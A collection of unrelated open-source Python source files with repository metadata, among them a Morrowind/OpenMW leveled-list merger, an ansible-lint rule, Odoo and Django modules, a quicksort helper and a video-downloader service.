mastsize = parseNum(sr[i+1]['data'])
masters.append((mastfile, mastsize))
tesrec['masters'] = masters
return tesrec
def pullSubs(rec, subtype):
return [ s for s in rec['subrecords'] if s['type'] == subtype ]
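# On-disk layout as read/written by this script:
#   record    = type (4 ascii bytes) + length (4-byte LE int) + flags (8 bytes),
#               followed by `length` bytes of subrecords packed back to back
#   subrecord = type (4 ascii bytes) + length (4-byte LE int) + data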
def readHeader(ba):
header = {}
header['type'] = ba[0:4].decode()
header['length'] = int.from_bytes(ba[4:8], 'little')
return header
def readSubRecord(ba):
sr = {}
sr['type'] = ba[0:4].decode()
sr['length'] = int.from_bytes(ba[4:8], 'little')
endbyte = 8 + sr['length']
sr['data'] = ba[8:endbyte]
return (sr, ba[endbyte:])
def readRecords(filename):
fh = open(filename, 'rb')
while True:
headerba = fh.read(16)
if headerba is None or len(headerba) < 16:
return None
record = {}
header = readHeader(headerba)
record['type'] = header['type']
record['length'] = header['length']
record['subrecords'] = []
# stash the filename here (a bit hacky, but useful)
record['fullpath'] = filename
remains = fh.read(header['length'])
while len(remains) > 0:
(subrecord, restofbytes) = readSubRecord(remains)
record['subrecords'].append(subrecord)
remains = restofbytes
yield record
def oldGetRecords(filename, rectype):
return ( r for r in readRecords(filename) if r['type'] == rectype )
def getRecords(filename, rectypes):
numtypes = len(rectypes)
retval = [ [] for x in range(numtypes) ]
for r in readRecords(filename):
if r['type'] in rectypes:
for i in range(numtypes):
if r['type'] == rectypes[i]:
retval[i].append(r)
return retval
def packStringSubRecord(lbl, strval):
str_bs = packString(strval) + bytes(1)
l = packLong(len(str_bs))
return packString(lbl) + l + str_bs
def packIntSubRecord(lbl, num, numsize=4):
# This is interesting. The 'pack' function from struct works fine like this:
#
# >>> pack('<l', 200)
# b'\xc8\x00\x00\x00'
#
# but breaks if you make that format string a non-literal:
#
# >>> fs = '<l'
# >>> pack(fs, 200)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# struct.error: repeat count given without format specifier
#
# This is as of Python 3.5.2
num_bs = b''
if numsize == 4:
# "standard" 4-byte longs, little-endian
num_bs = pack('<l', num)
elif numsize == 2:
num_bs = pack('<h', num)
elif numsize == 1:
# don't think endian-ness matters for bytes, but consistency
num_bs = pack('<b', num)
elif numsize == 8:
num_bs = pack('<q', num)
return packString(lbl) + packLong(numsize) + num_bs
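# e.g. packIntSubRecord('INTV', 3, 2)
#      -> b'INTV' + b'\x02\x00\x00\x00' + b'\x03\x00'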
def packLEV(rec):
start_bs = b''
id_bs = b''
if rec['type'] == 'LEVC':
start_bs += b'LEVC'
id_bs = 'CNAM'
else:
start_bs += b'LEVI'
id_bs = 'INAM'
headerflags_bs = bytes(8)
name_bs = packStringSubRecord('NAME', rec['name'])
calcfrom_bs = packIntSubRecord('DATA', rec['calcfrom'])
chance_bs = packIntSubRecord('NNAM', rec['chancenone'], 1)
subrec_bs = packIntSubRecord('INDX', len(rec['items']))
for (lvl, lid) in rec['items']:
subrec_bs += packStringSubRecord(id_bs, lid)
subrec_bs += packIntSubRecord('INTV', lvl, 2)
reclen = len(name_bs) + len(calcfrom_bs) + len(chance_bs) + len(subrec_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
name_bs + calcfrom_bs + chance_bs + subrec_bs
def packTES3(desc, numrecs, masters):
start_bs = b'TES3'
headerflags_bs = bytes(8)
hedr_bs = b'HEDR' + packLong(300)
version_bs = pack('<f', 1.0)
# .esp == 0, .esm == 1, .ess == 32
    # surprisingly, .omwaddon == 0 as well -- figured it would have its own
ftype_bs = bytes(4)
author_bs = packPaddedString('omwllf, copyright 2017, jmelesky', 32)
desc_bs = packPaddedString(desc, 256)
numrecs_bs = packLong(numrecs)
masters_bs = b''
for (m, s) in masters:
masters_bs += packStringSubRecord('MAST', m)
masters_bs += packIntSubRecord('DATA', s, 8)
reclen = len(hedr_bs) + len(version_bs) + len(ftype_bs) + len(author_bs) +\
len(desc_bs) + len(numrecs_bs) + len(masters_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
hedr_bs + version_bs + ftype_bs + author_bs + \
desc_bs + numrecs_bs + masters_bs
def ppSubRecord(sr):
if sr['type'] in ['NAME', 'INAM', 'CNAM']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseString(sr['data'])))
elif sr['type'] in ['DATA', 'NNAM', 'INDX', 'INTV']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseNum(sr['data'])))
else:
print(" %s, length %d" % (sr['type'], sr['length']))
def ppRecord(rec):
print("%s, length %d" % (rec['type'], rec['length']))
for sr in rec['subrecords']:
ppSubRecord(sr)
def ppLEV(rec):
if rec['type'] == 'LEVC':
print("Creature list '%s' from '%s':" % (rec['name'], rec['file']))
else:
print("Item list '%s' from '%s':" % (rec['name'], rec['file']))
print("flags: %d, chance of none: %d" % (rec['calcfrom'], rec['chancenone']))
for (lvl, lid) in rec['items']:
print(" %2d - %s" % (lvl, lid))
def ppTES3(rec):
print("TES3 record, type %d, version %f" % (rec['filetype'], rec['version']))
print("author: %s" % rec['author'])
print("description: %s" % rec['desc'])
for (mfile, msize) in rec['masters']:
print(" master %s, size %d" % (mfile, msize))
print()
def mergeableLists(alllists):
candidates = {}
for l in alllists:
lid = l['name']
if lid in candidates:
candidates[lid].append(l)
else:
candidates[lid] = [l]
mergeables = {}
for k in candidates:
if len(candidates[k]) > 1:
mergeables[k] = candidates[k]
return mergeables
def mergeLists(lls):
# last one gets priority for list-level attributes
last = lls[-1]
newLev = { 'type': last['type'],
'name': last['name'],
'calcfrom': last['calcfrom'],
'chancenone': last['chancenone'] }
allItems = []
for l in lls:
allItems += l['items']
newLev['files'] = [ x['file'] for x in lls ]
newLev['file'] = ', '.join(newLev['files'])
# This ends up being a bit tricky, but it prevents us
# from overloading lists with the same stuff.
#
# This is needed, because the original leveled lists
# contain multiple entries for some creatures/items, and
# that gets reproduced in many plugins.
#
# If we just added and sorted, then the more plugins you
# have, the less often you'd see plugin content. This
# method prevents the core game content from overwhelming
# plugin contents.
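    # Worked example (hypothetical lists): if plugin A contributes
    # ['rat', 'rat', 'bear'] and plugin B contributes ['rat', 'wolf'],
    # the merge keeps max(count) per entry and yields
    # ['bear', 'rat', 'rat', 'wolf'] rather than three rats.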
    allUniques = sorted(set(allItems))
newList = []
for i in allUniques:
newCount = max([ x['items'].count(i) for x in lls ])
newList += [i] * newCount
newLev['items'] = newList
return newLev
def mergeAllLists(alllists):
mergeables = mergeableLists(alllists)
merged = []
for k in mergeables:
merged.append(mergeLists(mergeables[k]))
return merged
def readCfg(cfg):
# first, open the file and pull all 'data' and 'content' lines, in order
data_dirs = []
mods = []
with open(cfg, 'r') as f:
for l in f.readlines():
# match of form "blah=blahblah"
m = re.search(r'^(.*)=(.*)$', l)
if m:
varname = m.group(1).strip()
# get rid of not only whitespace, but also surrounding quotes
varvalue = m.group(2).strip().strip('\'"')
if varname == 'data':
data_dirs.append(varvalue)
elif varname == 'content':
mods.append(varvalue)
# we've got the basenames of the mods, but not the full paths
# and we have to search through the data_dirs to find them
fp_mods = []
for m in mods:
for p in data_dirs:
full_path = os.path.join(p, m)
if os.path.exists(full_path):
fp_mods.append(full_path)
break
print("Config file parsed...")
return fp_mods
def dumplists(cfg):
llists = []
fp_mods = readCfg(cfg)
for f in fp_mods:
[ ppTES3(parseTES3(x)) for x in oldGetRecords(f, 'TES3') ]
for f in fp_mods:
llists += [ parseLEV(x) for x in oldGetRecords(f, 'LEVI') ]
for f in fp_mods:
llists += [ parseLEV(x) for x in oldGetRecords(f, 'LEVC') ]
for l in llists:
ppLEV(l)
def main(cfg, outmoddir, outmod):
fp_mods = readCfg(cfg)
# first, let's grab the "raw" records from the files
(rtes3, rlevi, rlevc) = ([], [], [])
for f in fp_mods:
print("Parsing '%s' for relevant records" % f)
(rtes3t, rlevit, rlevct) = getRecords(f, ('TES3', 'LEVI', 'LEVC'))
rtes3 += rtes3t
rlevi += rlevit
rlevc += rlevct
# next, parse the tes3 records so we can get a list
# of master files required by all our mods
tes3list = [ parseTES3(x) for x in rtes3 ]
masters = {}
for t in tes3list:
for m in t['masters']:
masters[m[0]] = m[1]
master_list = [ (k,v) for (k,v) in masters.items() ]
# now, let's parse the levi and levc records into
# mergeable lists, then merge them
# creature lists
clist = [ parseLEV(x) for x in rlevc ]
levc = mergeAllLists(clist)
# item lists
ilist = [ parseLEV(x) for x in rlevi ]
levi = mergeAllLists(ilist)
# now build the binary representation of
# the merged lists.
# along the way, build up the module
# description for the new merged mod, out
# of the names of mods that had lists
llist_bc = b''
pluginlist = []
for x in levi + levc:
# ppLEV(x)
llist_bc += packLEV(x)
pluginlist += x['files']
plugins = set(pluginlist)
moddesc = "Merged leveled lists from: %s" % ', '.join(plugins)
# finally, build the binary form of the
# TES3 record, and write the whole thing
# out to disk
if not os.path.exists(outmoddir):
p = Path(outmoddir)
p.mkdir(parents=True)
with open(outmod, 'wb') as f:
f.write(packTES3(moddesc, len(levi + levc), master_list))
f.write(llist_bc)
# And give some hopefully-useful instructions
modShortName = os.path.basename(outmod)
print("\n\n****************************************")
print(" Great! I think that worked. When you next start the OpenMW Launcher, look for a module named %s. Make sure of the following things:" % modShortName)
print(" 1. %s is at the bottom of the list. Drag it to the bottom if it's not. It needs to load last." % modShortName)
print(" 2. %s is checked (enabled)" % modShortName)
print(" 3. Any other OMWLLF mods are *un*checked. Loading them might not cause problems, but probably will")
print("\n")
print(" Then, go ahead and start the game! Your leveled lists should include adjustments from all relevant enabled mods")
print("\n")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--conffile', type = str, default = None,
action = 'store', required = False,
help = 'Conf file to use. Optional. By default, attempts to use the default conf file location.')
parser.add_argument('-d', '--moddir', type = str, default = None,
action = 'store', required = False,
help = 'Directory to store the new module in. By default, attempts to use the default work directory for OpenMW-CS')
parser.add_argument('-m', '--modname', type = str, default = None,
action = 'store', required = False,
help = 'Name of the new module to create. By default, this is "OMWLLF Mod - <today\'s date>.omwaddon.')
parser.add_argument('--dumplists', default = False,
action = 'store_true', required = False,
help = 'Instead of generating merged lists, dump all leveled lists in the conf mods. Used for debugging')
p = parser.parse_args()
# determine the conf file to use
confFile = ''
if p.conffile:
confFile = p.conffile
else:
pl = sys.platform
if pl in configPaths:
baseDir = os.path.expanduser(configPaths[pl])
confFile = os.path.join(baseDir, configFilename)
elif pl == 'win32':
# this is ugly. first, imports that only work properly on windows
from ctypes import *
import ctypes.wintypes
buf = create_unicode_buffer(ctypes.wintypes.MAX_PATH)
# opaque arguments. they are, roughly, for our purposes:
# - an indicator of folder owner (0 == current user)
# - an id for the type of folder (5 == 'My Documents')
# - an indicator for user to call from (0 same as above)
# - a bunch of flags for different things
# (if you want, for example, to get the default path
# instead of the actual path, or whatnot)
# 0 == current stuff
# - the variable to hold the return value
windll.shell32.SHGetFolderPathW(0, 5, 0, 0, buf)
# pull out the return value and construct the rest
baseDir = os.path.join(buf.value, 'My Games', 'OpenMW')
confFile = os.path.join(baseDir, configFilename)
else:
print("Sorry, I don't recognize the platform '%s'. You can try specifying the conf file using the '-c' flag." % p)
sys.exit(1)
baseModDir = ''
if p.moddir:
baseModDir = p.moddir
else:
pl = sys.platform
if pl in configPaths:
baseModDir = os.path.expanduser(modPaths[pl])
elif pl == 'win32':
# this is ugly in exactly the same ways as above.
# see there for more information
from ctypes import *
import ctypes.wintypes
buf = create_unicode_buffer(ctypes.wintypes.MAX_PATH)
windll.shell32.SHGetFolderPathW(0, 5, 0, 0, buf)
baseDir = os.path.join(buf.value, 'My Games', 'OpenMW')
baseModDir = os.path.join(baseDir, 'data')
else:
print("Sorry, I don't recognize the platform '%s'. You can try specifying the conf file using the '-c' flag." % p)
sys.exit(1)
if not os.path.exists(confFile):
print("Sorry, the conf file '%s' doesn't seem to exist." % confFile)
sys.exit(1)
modName = ''
if p.modname:
modName = p.modname
else:
modName = 'OMWLLF Mod - %s.omwaddon' % date.today().strftime('%Y-%m-%d')
modFullPath = os.path.join(baseModDir, modName)
if p.dumplists:
dumplists(confFile)
else:
main(confFile, baseModDir, modFullPath)
# regarding the windows path detection:
#
# "SHGetFolderPath" is deprecated in favor of "SHGetKnownFolderPath", but
# >>> windll.shell32.SHGetKnownFolderPath('{FDD39AD0-238F-46AF-ADB4-6C85480369C7}', 0, 0, buf2)
# -2147024894
|
jmelesky/omwllf
|
omwllf.py
|
Python
|
isc
| 17,912 | 0.00709 |
#!/bin/python
import sys
def getSumOfAP(n, max):
size = (max - 1) // n
    return size * (n + size * n) / 2
def getSumOfMultiples(n):
return (getSumOfAP(3, n) + getSumOfAP(5, n) - getSumOfAP(15, n))
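# Worked check for n = 10: multiples of 3 below 10 sum to 3+6+9 = 18,
# multiples of 5 contribute 5, and multiples of 15 (counted by both the
# 3- and 5-series, hence subtracted once) contribute 0, giving 23.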
def main():
numInputs = int(raw_input().strip())
for idx in xrange(numInputs):
n = int(raw_input().strip())
        ans = getSumOfMultiples(n)
print(ans)
if __name__ == '__main__':
main()
|
pavithranrao/projectEuler
|
projectEulerPython/problem001.py
|
Python
|
mit
| 429 | 0 |
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint import AnsibleLintRule
class MismatchedBracketRule(AnsibleLintRule):
id = 'ANSIBLE0003'
shortdesc = 'Mismatched { and }'
description = 'If lines contain more { than } or vice ' + \
'versa then templating can fail nastily'
tags = ['templating']
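    # Example: the line "msg: {{ item }" contains two '{' but only one '}',
    # so match() returns True and the rule flags it.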
def match(self, file, line):
return line.count("{") != line.count("}")
|
schlueter/ansible-lint
|
lib/ansiblelint/rules/MismatchedBracketRule.py
|
Python
|
mit
| 1,497 | 0 |
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
from datetime import *
import time
class clv_tray(models.Model):
_inherit = 'clv_tray'
date = fields.Datetime("Status change date", required=True, readonly=True,
default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
date_activation = fields.Datetime("Activation date", required=False, readonly=False)
date_inactivation = fields.Datetime("Inactivation date", required=False, readonly=False)
date_suspension = fields.Datetime("Suspension date", required=False, readonly=False)
state = fields.Selection([('new','New'),
('active','Active'),
('inactive','Inactive'),
('suspended','Suspended')
], string='Status', default='new', readonly=True, required=True, help="")
@api.one
def button_new(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.state = 'new'
@api.one
def button_activate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_activation:
self.date_activation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'active'
@api.one
def button_inactivate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_inactivation:
self.date_inactivation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'inactive'
@api.one
def button_suspend(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_suspension:
self.date_suspension = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'suspended'
|
odoousers2014/odoo_addons-2
|
clv_tray/wkf/clv_tray_wkf.py
|
Python
|
agpl-3.0
| 3,291 | 0.009116 |
def init_actions_(service, args):
"""
    this needs to return a mapping of actions representing the dependencies between actions.
    Look at ACTION_DEPS in this module for an example of what is expected
"""
# some default logic for simple actions
return {
'test': ['install']
}
def test(job):
"""
Tests parsing of a bp with/without default values
"""
import sys
RESULT_OK = 'OK : %s'
RESULT_FAILED = 'FAILED : %s'
RESULT_ERROR = 'ERROR : %s %%s' % job.service.name
model = job.service.model
model.data.result = RESULT_OK % job.service.name
test_repo_path = j.sal.fs.joinPaths(j.dirs.varDir, 'tmp', 'test_validate_model')
sample_bp_path = j.sal.fs.joinPaths('/opt/code/github/jumpscale/jumpscale_core8/tests/samples/test_validate_delete_model_sample.yaml')
try:
if j.sal.fs.exists(test_repo_path):
j.sal.fs.removeDirTree(test_repo_path)
test_repo = j.atyourservice.repoCreate(test_repo_path, 'git@github.com:0-complexity/ays_automatic_cockpit_based_testing.git')
bp_path = j.sal.fs.joinPaths(test_repo.path, 'blueprints', 'test_validate_delete_model_sample.yaml')
j.sal.fs.copyFile(j.sal.fs.joinPaths(sample_bp_path), j.sal.fs.joinPaths(test_repo.path, 'blueprints'))
test_repo.blueprintExecute(bp_path)
action = 'install'
role = 'sshkey'
instance = 'main'
for service in test_repo.servicesFind(actor="%s.*" % role, name=instance):
service.scheduleAction(action=action, period=None, log=True, force=False)
run = test_repo.runCreate(profile=False, debug=False)
run.execute()
test_repo.destroy()
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "actors")):
model.data.result = RESULT_FAILED % ('Actors directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "services")):
model.data.result = RESULT_FAILED % ('Services directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "recipes")):
model.data.result = RESULT_FAILED % ('Recipes directory is not deleted')
if test_repo.actors:
model.data.result = RESULT_FAILED % ('Actors model is not removed')
if test_repo.services:
model.data.result = RESULT_FAILED % ('Services model is not removed')
if not j.core.jobcontroller.db.runs.find(repo=test_repo.model.key):
model.data.result = RESULT_FAILED % ('Jobs are deleted after repository destroy')
except:
model.data.result = RESULT_ERROR % str(sys.exc_info()[:2])
finally:
job.service.save()
|
Jumpscale/ays_jumpscale8
|
tests/test_services/test_validate_delete_models/actions.py
|
Python
|
apache-2.0
| 2,695 | 0.005937 |
#!/bin/python
def swap(findex, sindex, ar):
ar[findex], ar[sindex] = ar[sindex], ar[findex]
def partition(ar, lo, hi):
    '''Lomuto partition: picks the middle element as the pivot and moves
    everything smaller than it to the left of the returned index.'''
    # move the chosen pivot (the middle element) out of the way, to position hi
    pivotIndex = (lo+hi)//2
    swap(pivotIndex, hi, ar)
    pivot = ar[hi]
    for index in xrange(lo, hi):
        if ar[index] < pivot:
            swap(index, lo, ar)
            lo += 1
    # place the pivot between the smaller and the not-smaller elements
    swap(lo, hi, ar)
    return lo
def quickSort(ar):
'''Iterative unstable in-place sort'''
n = len(ar)
hi = n-1
lo = 0
stack = [(lo, hi)]
while stack:
lo, hi = stack.pop()
pivot = partition(ar, lo, hi)
if lo<pivot-1:
stack.insert(0, (lo, pivot-1))
if pivot+1<hi:
stack.insert(0, (pivot+1, hi))
def quickSortRec(ar, n, lo, hi):
'''Recursive unstable in-place sort'''
pivot = partition(ar, lo, hi)
# print lo, pivot, hi
if lo<pivot-1 and lo != pivot:
quickSortRec(ar, n, lo, pivot-1)
# print ' '.join(ar)
if pivot+1<hi and pivot != hi:
quickSortRec(ar, n, pivot+1, hi)
# print ' '.join(ar)
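# Minimal usage sketch (assumes Python 2, matching the xrange calls above):
if __name__ == '__main__':
    sample = [5, 2, 9, 2, 7]
    quickSort(sample)
    print sample  # -> [2, 2, 5, 7, 9]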
|
codecakes/algorithms
|
algorithms/code30DaysImp/helper/quicksort.py
|
Python
|
mit
| 1,313 | 0.006855 |
from __future__ import absolute_import
import re
import json
import copy
import os
from svtplay_dl.service import Service, OpenGraphThumbMixin
from svtplay_dl.utils.urllib import urlparse
from svtplay_dl.utils import filenamify
from svtplay_dl.fetcher.http import HTTP
from svtplay_dl.fetcher.hds import hdsparse
from svtplay_dl.fetcher.hls import HLS, hlsparse
from svtplay_dl.error import ServiceError
class Vg(Service, OpenGraphThumbMixin):
supported_domains = ['vg.no', 'vgtv.no']
def get(self, options):
data = self.get_urldata()
match = re.search(r'data-videoid="([^"]+)"', data)
if not match:
parse = urlparse(self.url)
match = re.search(r'video/(\d+)/', parse.fragment)
if not match:
yield ServiceError("Can't find video file for: %s" % self.url)
return
videoid = match.group(1)
data = self.http.request("get", "http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website" % videoid).text
jsondata = json.loads(data)
if options.output_auto:
directory = os.path.dirname(options.output)
title = "%s" % jsondata["title"]
title = filenamify(title)
if len(directory):
options.output = os.path.join(directory, title)
else:
options.output = title
if self.exclude(options):
yield ServiceError("Excluding video")
return
if "hds" in jsondata["streamUrls"]:
streams = hdsparse(copy.copy(options), self.http.request("get", jsondata["streamUrls"]["hds"], params={"hdcore": "3.7.0"}).text, jsondata["streamUrls"]["hds"])
if streams:
for n in list(streams.keys()):
yield streams[n]
if "hls" in jsondata["streamUrls"]:
streams = hlsparse(jsondata["streamUrls"]["hls"], self.http.request("get", jsondata["streamUrls"]["hls"]).text)
for n in list(streams.keys()):
yield HLS(copy.copy(options), streams[n], n)
if "mp4" in jsondata["streamUrls"]:
yield HTTP(copy.copy(options), jsondata["streamUrls"]["mp4"])
|
leakim/svtplay-dl
|
lib/svtplay_dl/service/vg.py
|
Python
|
mit
| 2,200 | 0.001364 |
from st2actions.runners.pythonrunner import Action
from st2client.client import Client
# Keep compatibility with 0.8 and 0.11 until st2build is upgraded
try:
from st2client.models.datastore import KeyValuePair
except ImportError:
from st2client.models.keyvalue import KeyValuePair
class KVPAction(Action):
def run(self, key, action, st2host='localhost', value=""):
try:
client = Client()
except Exception as e:
return e
if action == 'get':
kvp = client.keys.get_by_name(key)
if not kvp:
raise Exception('Key error with %s.' % key)
return kvp.value
else:
instance = client.keys.get_by_name(key) or KeyValuePair()
instance.id = key
instance.name = key
instance.value = value
            if action == 'delete':
                # remove the key; client.keys.delete() is assumed to be the
                # standard st2client resource-manager delete method
                return client.keys.delete(instance)
            kvp = client.keys.update(instance) if action in ['create', 'update'] else None
            if kvp is None:
                raise Exception('Unsupported action: %s.' % action)
            return kvp.serialize()
|
StackStorm/st2cd
|
actions/kvstore.py
|
Python
|
apache-2.0
| 1,061 | 0.000943 |
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from mainmodels.models import Course, FeaturedCourse
# Create your views here.
def index(req):
    mostPopularCourses = Course.objects.raw('''
        SELECT * FROM mainmodels_course as main_course
        JOIN (SELECT main_tran.courseID, COUNT(main_tran.takerID) as taker_amount
              FROM mainmodels_transaction as main_tran
              GROUP BY main_tran.courseID
              ORDER BY taker_amount DESC) as main_count
        ON main_course.courseID = main_count.courseID
        LIMIT 10;''')
    featureCourses = FeaturedCourse.objects.raw('''
        SELECT * FROM mainmodels_featuredcourse as main_feat
        JOIN mainmodels_course as main_course
        ON main_feat.course_id = main_course.courseID
        LIMIT 10;''')
return render(req, 'index/main.html', {'pageTitle': 'Coursing Field', 'mostPopularCourses': mostPopularCourses, 'featureCourses': featureCourses})
|
PNNutkung/Coursing-Field
|
index/views.py
|
Python
|
apache-2.0
| 876 | 0.004566 |
#!/usr/bin/python
import pygame
import math
import random
import sys
import PixelPerfect
from pygame.locals import *
from water import Water
from menu import Menu
from game import Game
from highscores import Highscores
from options import Options
import util
from locals import *
import health
import cloud
import mine
import steamboat
import pirateboat
import shark
import seagull
def init():
health.init()
steamboat.init()
shark.init()
pirateboat.init()
cloud.init()
mine.init()
seagull.init()
def main():
global SCREEN_FULLSCREEN
pygame.init()
util.load_config()
if len(sys.argv) > 1:
for arg in sys.argv:
if arg == "-np":
Variables.particles = False
elif arg == "-na":
Variables.alpha = False
elif arg == "-nm":
Variables.music = False
elif arg == "-ns":
Variables.sound = False
elif arg == "-f":
SCREEN_FULLSCREEN = True
scr_options = 0
if SCREEN_FULLSCREEN: scr_options += FULLSCREEN
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT),scr_options ,32)
pygame.display.set_icon(util.load_image("kuvake"))
pygame.display.set_caption("Trip on the Funny Boat")
init()
joy = None
if pygame.joystick.get_count() > 0:
joy = pygame.joystick.Joystick(0)
joy.init()
try:
util.load_music("JDruid-Trip_on_the_Funny_Boat")
if Variables.music:
pygame.mixer.music.play(-1)
except:
# It's not a critical problem if there's no music
pass
pygame.time.set_timer(NEXTFRAME, 1000 / FPS) # 30 fps
Water.global_water = Water()
main_selection = 0
while True:
main_selection = Menu(screen, ("New Game", "High Scores", "Options", "Quit"), main_selection).run()
if main_selection == 0:
# New Game
selection = Menu(screen, ("Story Mode", "Endless Mode")).run()
if selection == 0:
# Story
score = Game(screen).run()
Highscores(screen, score).run()
elif selection == 1:
# Endless
score = Game(screen, True).run()
Highscores(screen, score, True).run()
elif main_selection == 1:
# High Scores
selection = 0
while True:
selection = Menu(screen, ("Story Mode", "Endless Mode", "Endless Online"), selection).run()
if selection == 0:
# Story
Highscores(screen).run()
elif selection == 1:
# Endless
Highscores(screen, endless = True).run()
elif selection == 2:
# Online
Highscores(screen, endless = True, online = True).run()
else:
break
elif main_selection == 2:
# Options
selection = Options(screen).run()
else: #if main_selection == 3:
# Quit
return
if __name__ == '__main__':
main()
|
italomaia/turtle-linux
|
games/FunnyBoat/run_game.py
|
Python
|
gpl-3.0
| 3,190 | 0.006583 |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Portal Partner Fix',
'version': '8.0.1.0.0',
'category': '',
'sequence': 14,
'summary': '',
'description': """
Portal Partner Fix
==================
Let user read his commercial partner
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'portal',
],
'data': [
'security/portal_security.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
dvitme/odoo-addons
|
portal_partner_fix/__openerp__.py
|
Python
|
agpl-3.0
| 1,565 | 0.000639 |
#!/usr/bin/python
import os
from autotest.client import utils
version = 1
def setup(tarball, topdir):
srcdir = os.path.join(topdir, 'src')
utils.extract_tarball_to_dir(tarball, srcdir)
os.chdir(srcdir)
utils.make()
os.environ['MAKEOPTS'] = 'mandir=/usr/share/man'
utils.make('install')
os.chdir(topdir)
pwd = os.getcwd()
tarball = os.path.join(pwd, 'grubby-8.11-autotest.tar.bz2')
utils.update_version(os.path.join(pwd, 'src'),
False, version, setup, tarball, pwd)
|
nacc/autotest
|
client/deps/grubby/grubby.py
|
Python
|
gpl-2.0
| 518 | 0.003861 |
###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from amcat.models import CodingRule, CodingSchemaField, Code
from amcat.models.coding.codingruletoolkit import schemarules_valid, parse, to_json, EQUALS, \
clean_tree, NOT, OR
from amcat.models.coding.codingschema import ValidationError
from amcat.tools import amcattest
class TestCodingRuleToolkit(amcattest.AmCATTestCase):
def condition(self, s, c):
return CodingRule(codingschema=s, condition=c)
def test_schemafield_valid(self):
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
CodingRule.objects.all().delete()
# Test multiple (correct) rules
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
